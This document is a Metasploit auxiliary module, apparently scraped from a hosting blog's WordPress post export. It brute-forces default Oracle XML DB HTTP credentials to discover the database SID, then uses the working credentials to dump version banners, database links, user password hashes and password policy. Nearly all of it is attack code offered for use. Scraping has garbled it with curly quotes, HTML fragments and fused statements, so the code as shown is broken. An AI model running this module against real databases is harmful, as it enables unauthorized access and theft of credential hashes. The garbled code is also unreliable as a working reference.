##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner<\/p>\n
def initialize
super(
‘Name’ => ‘Oracle XML DB SID Discovery via Brute Force’,
‘Description’ => %q{
This module attempts to retrieve the sid from the Oracle XML DB httpd server,
utilizing Pete Finnigan’s default oracle password list.
},
‘References’ =>
[
[ ‘URL’, ‘http:\/\/dsecrg.com\/files\/pub\/pdf\/Different_ways_to_guess_Oracle_database_SID_(eng).pdf’ ],
[ ‘URL’, ‘http:\/\/www.petefinnigan.com\/default\/oracle_default_passwords.csv’],
],
‘Author’ => [ ‘nebulus’ ],
‘License’ => MSF_LICENSE
)<\/p>\n
register_options(
[
OptString.new(‘CSVFILE’, [ false, ‘The file that contains a list of default accounts.’, File.join(Msf::Config.install_root, ‘data’, ‘wordlists’, ‘oracle_default_passwords.csv’)]),
Opt::RPORT(8080),
])
end<\/p>\n
def run_host(ip)
begin<\/p>\n
res = send_request_raw({
‘uri’ => ‘\/oradb\/PUBLIC\/GLOBAL_NAME’,
‘version’ => ‘1.0’,
‘method’ => ‘GET’
}, 5)
return if not res<\/p>\n
if(res.code == 200)
vprint_status(“http:\/\/#{ip}:#{datastore[‘RPORT’]}\/oradb\/PUBLIC\/GLOBAL_NAME (#{res.code}) is not password protected.”)
return
elsif(res.code == 403 || res.code == 401)
print_status(“http:\/\/#{ip}:#{datastore[‘RPORT’]}\/oradb\/PUBLIC\/GLOBAL_NAME (#{res.code})”)
end<\/p>\n
list = datastore[‘CSVFILE’]users = []\n
fd = CSV.foreach(list) do |brute|<\/p>\n
dbuser = brute[2].downcase
dbpass = brute[3].downcase
user_pass = “#{dbuser}:#{dbpass}”<\/p>\n
res = send_request_raw({
‘uri’ => ‘\/oradb\/PUBLIC\/GLOBAL_NAME’,
‘version’ => ‘1.0’,
‘method’ => ‘GET’,
‘headers’ =>
{
‘Authorization’ => “Basic #{Rex::Text.encode_base64(user_pass)}”
}
}, 10)<\/p>\n
if( not res )
vprint_error(“Unable to retrieve SID for #{ip}:#{datastore[‘RPORT’]} with #{dbuser} \/ #{dbpass}…”)
next
end
if (res.code == 200)
if (not res.body.length > 0)
# sometimes weird bug where body doesn’t have value yet
res.body = res.bufq
end
sid = res.body.scan(\/<GLOBAL_NAME>(\\S+)<\\\/GLOBAL_NAME>\/)[0]report_note(
:host => ip,
:proto => ‘tcp’,
:port => datastore[‘RPORT’],
:type => ‘SERVICE_NAME’,
:data => sid,
:update => :unique_data
)
print_good(“Discovered SID: ‘#{sid[0]}’ for host #{ip}:#{datastore[‘RPORT’]} with #{dbuser} \/ #{dbpass}”)
users.push(user_pass)
else
vprint_error(“Unable to retrieve SID for #{ip}:#{datastore[‘RPORT’]} with #{dbuser} \/ #{dbpass}…”)
end
end #fd.each<\/p>\n
good = false
users.each do |user_pass|
(u,p) = user_pass.split(‘:’)<\/p>\n
# get versions
res = send_request_raw({
‘uri’ => ‘\/oradb\/PUBLIC\/PRODUCT_COMPONENT_VERSION’,
‘version’ => ‘1.1’,
‘method’ => ‘GET’,
‘headers’ =>
{
‘Authorization’ => “Basic #{Rex::Text.encode_base64(user_pass)}”
}
}, -1)<\/p>\n
if(res)
if(res.code == 200)
if (not res.body.length > 0)
# sometimes weird bug where body doesn’t have value yet
res.body = res.bufq
end<\/p>\n
doc = REXML::Document.new(res.body)<\/p>\n
print_good(“Version Information ==> as #{u}”)
doc.elements.each(‘PRODUCT_COMPONENT_VERSION\/ROW’) do |e|
p = e.elements[‘PRODUCT’].get_text
v = e.elements[‘VERSION’].get_text
s = e.elements[‘STATUS’].get_text
report_note(
:host => datastore[‘RHOST’],
:sname => ‘xdb’,
:proto => ‘tcp’,
:port => datastore[‘RPORT’],
:type => ‘ORA_ENUM’,
:data => “Component Version: #{p}#{v}”,
:update => :unique_data
)
print_good(“\\t#{p}\\t\\t#{v}\\t(#{s})”)<\/p>\n
end
end
end<\/p>\n
# More version information
res = send_request_raw({
‘uri’ => ‘\/oradb\/PUBLIC\/ALL_REGISTRY_BANNERS’,
‘version’ => ‘1.1’,
‘method’ => ‘GET’,
‘headers’ =>
{
‘Authorization’ => “Basic #{Rex::Text.encode_base64(user_pass)}”
}
}, -1)<\/p>\n
if(res)
if(res.code == 200)
if (not res.body.length > 0)
# sometimes weird bug where body doesn’t have value yet
res.body = res.bufq
end<\/p>\n
doc = REXML::Document.new(res.body)<\/p>\n
doc.elements.each(‘ALL_REGISTRY_BANNERS\/ROW’) do |e|
next if e.elements[‘BANNER’] == nil
b = e.elements[‘BANNER’].get_text
report_note(
:host => datastore[‘RHOST’],
:proto => ‘tcp’,
:sname => ‘xdb’,
:port => datastore[‘RPORT’],
:type => ‘ORA_ENUM’,
:data => “Component Version: #{b}”,
:update => :unique_data
)
print_good(“\\t#{b}”)
end
end
end<\/p>\n
# database links
res = send_request_raw({
‘uri’ => ‘\/oradb\/PUBLIC\/ALL_DB_LINKS’,
‘version’ => ‘1.1’,
‘method’ => ‘GET’,
‘headers’ =>
{
‘Authorization’ => “Basic #{Rex::Text.encode_base64(user_pass)}”
}
}, -1)<\/p>\n
if(res)
if(res.code == 200)
if (not res.body.length > 0)
# sometimes weird bug where body doesn’t have value yet
res.body = res.bufq
end<\/p>\n
doc = REXML::Document.new(res.body)<\/p>\n
print_good(“Database Link Information ==> as #{u}”)
doc.elements.each(‘ALL_DB_LINKS\/ROW’) do |e|
next if(e.elements[‘HOST’] == nil or e.elements[‘USERNAME’] == nil or e.elements[‘DB_LINK’] == nil)
h = e.elements[‘HOST’].get_text
d = e.elements[‘DB_LINK’].get_text
us = e.elements[‘USERNAME’].get_text<\/p>\n
sid = h.to_s.scan(\/\\(SID\\s\\=\\s(\\S+)\\)\\)\\)\/)[0]if(h.to_s.match(\/^\\(DESCRIPTION\/) )
h = h.to_s.scan(\/\\(HOST\\s\\=\\s(\\S+)\\)\\(\/)[0]end<\/p>\n
if(sid and sid != “”)
print_good(“\\tLink: #{d}\\t#{us}\\@#{h[0]}\/#{sid[0]}”)
report_note(
:host => h[0],
:proto => ‘tcp’,
:port => datastore[‘RPORT’],
:sname => ‘xdb’,
:type => ‘oracle_sid’,
:data => sid,
:update => :unique_data
)
else
print_good(“\\tLink: #{d}\\t#{us}\\@#{h}”)
end
end
end
end<\/p>\n
# get users
res = send_request_raw({
‘uri’ => ‘\/oradb\/PUBLIC\/DBA_USERS’,
‘version’ => ‘1.1’,
‘method’ => ‘GET’,
‘read_max_data’ => (1024*1024*10),
‘headers’ =>
{
‘Authorization’ => “Basic #{Rex::Text.encode_base64(user_pass)}”
}
}, -1)<\/p>\n
if res and res.code == 200
if (not res.body.length > 0)
# sometimes weird bug where body doesn’t have value yet
res.body = res.bufq
end<\/p>\n
doc = REXML::Document.new(res.body)
print_good(“Username\/Hashes on #{ip}:#{datastore[‘RPORT’]} ==> as #{u}”)<\/p>\n
doc.elements.each(‘DBA_USERS\/ROW’) do |user|<\/p>\n
us = user.elements[‘USERNAME’].get_text
h = user.elements[‘PASSWORD’].get_text
as = user.elements[‘ACCOUNT_STATUS’].get_text
print_good(“\\t#{us}:#{h}:#{as}”)
good = true
if(as.to_s == “OPEN”)
report_note(
:host => datastore[‘RHOST’],
:proto => ‘tcp’,
:sname => ‘xdb’,
:port => datastore[‘RPORT’],
:type => ‘ORA_ENUM’,
:data => “Active Account #{u}:#{h}:#{as}”,
:update => :unique_data
)
else
report_note(
:host => datastore[‘RHOST’],
:proto => ‘tcp’,
:sname => ‘xdb’,
:port => datastore[‘RPORT’],
:type => ‘ORA_ENUM’,
:data => “Disabled Account #{u}:#{h}:#{as}”,
:update => :unique_data
)
end
end
end<\/p>\n
# get password information
res = send_request_raw({
‘uri’ => ‘\/oradb\/PUBLIC\/USER_PASSWORD_LIMITS’,
‘version’ => ‘1.1’,
‘method’ => ‘GET’,
‘read_max_data’ => (1024*1024*10),
‘headers’ =>
{
‘Authorization’ => “Basic #{Rex::Text.encode_base64(user_pass)}”
}
}, -1)<\/p>\n
if res and res.code == 200
if (not res.body.length > 0)
# sometimes weird bug where body doesn’t have value yet
res.body = res.bufq
end<\/p>\n
doc = REXML::Document.new(res.body)<\/p>\n
print_good(“Password Policy ==> as #{u}”)
fla=plit=pgt=prt=prm=plot=”
doc.elements.each(‘USER_PASSWORD_LIMITS\/ROW’) do |e|
next if e.elements[‘RESOURCE_NAME’] == nil<\/p>\n
case
when(e.elements[‘RESOURCE_NAME’].get_text == ‘FAILED_LOGIN_ATTEMPTS’)
fla = e.elements[‘LIMIT’].get_text
when(e.elements[‘RESOURCE_NAME’].get_text == ‘PASSWORD_LIFE_TIME’)
plit = e.elements[‘LIMIT’].get_text
when(e.elements[‘RESOURCE_NAME’].get_text == ‘PASSWORD_REUSE_TIME’)
prt = e.elements[‘LIMIT’].get_text
when(e.elements[‘RESOURCE_NAME’].get_text == ‘PASSWORD_REUSE_MAX’)
prm = e.elements[‘LIMIT’].get_text
when(e.elements[‘RESOURCE_NAME’].get_text == ‘PASSWORD_LOCK_TIME’)
plot = e.elements[‘LIMIT’].get_text
when(e.elements[‘RESOURCE_NAME’].get_text == ‘PASSWORD_GRACE_TIME’)
pgt = e.elements[‘LIMIT’].get_text
end
end<\/p>\n
print_good(
“\\tFailed Login Attempts: #{fla}\\n\\t” +
“Password Life Time: #{plit}\\n\\t” +
“Password Reuse Time: #{prt}\\n\\t” +
“Password Reuse Max: #{prm}\\n\\t” +
“Password Lock Time: #{plot}\\n\\t” +
“Password Grace Time: #{pgt}”
)
report_note(
:host => datastore[‘RHOST’],
:proto => ‘tcp’,
:sname => ‘xdb’,
:port => datastore[‘RPORT’],
:type => ‘ORA_ENUM’,
:data => “Password Maximum Reuse Time: #{prm}”,
:update => :unique_data
)
report_note(
:host => datastore[‘RHOST’],
:proto => ‘tcp’,
:sname => ‘xdb’,
:port => datastore[‘RPORT’],
:type => ‘ORA_ENUM’,
:data => “Password Reuse Time: #{prt}”,
:update => :unique_data
)
report_note(
:host => datastore[‘RHOST’],
:proto => ‘tcp’,
:sname => ‘xdb’,
:port => datastore[‘RPORT’],
:type => ‘ORA_ENUM’,
:data => “Password Life Time: #{plit}”,
:update => :unique_data
)
report_note(
:host => datastore[‘RHOST’],
:proto => ‘tcp’,
:sname => ‘xdb’,
:port => datastore[‘RPORT’],
:type => ‘ORA_ENUM’,
:data => “Account Fail Logins Permitted: #{fla}”,
:update => :unique_data
)
report_note(
:host => datastore[‘RHOST’],
:proto => ‘tcp’,
:sname => ‘xdb’,
:port => datastore[‘RPORT’],
:type => ‘ORA_ENUM’,
:data => “Account Lockout Time: #{plot}”,
:update => :unique_data
)
report_note(
:host => datastore[‘RHOST’],
:proto => ‘tcp’,
:sname => ‘xdb’,
:port => datastore[‘RPORT’],
:type => ‘ORA_ENUM’,
:data => “Account Password Grace Time: #{pgt}”,
:update => :unique_data
)
end<\/p>\n
break if good
end # users.each
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Auxiliaryinclude Msf::Auxiliary::Reportinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Scanner def initializesuper(‘Name’ => ‘Oracle XML DB SID Discovery via Brute Force’,‘Description’ => %q{This module attempts to retrieve the sid from the Oracle XML DB httpd server,utilizing Pete Finnigan’s default oracle password list.},‘References’ =>[[ ‘URL’, ‘http:\/\/dsecrg.com\/files\/pub\/pdf\/Different_ways_to_guess_Oracle_database_SID_(eng).pdf’ ],[ ‘URL’, ‘http:\/\/www.petefinnigan.com\/default\/oracle_default_passwords.csv’],],‘Author’ => …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59330","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59330","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59330"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59330\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}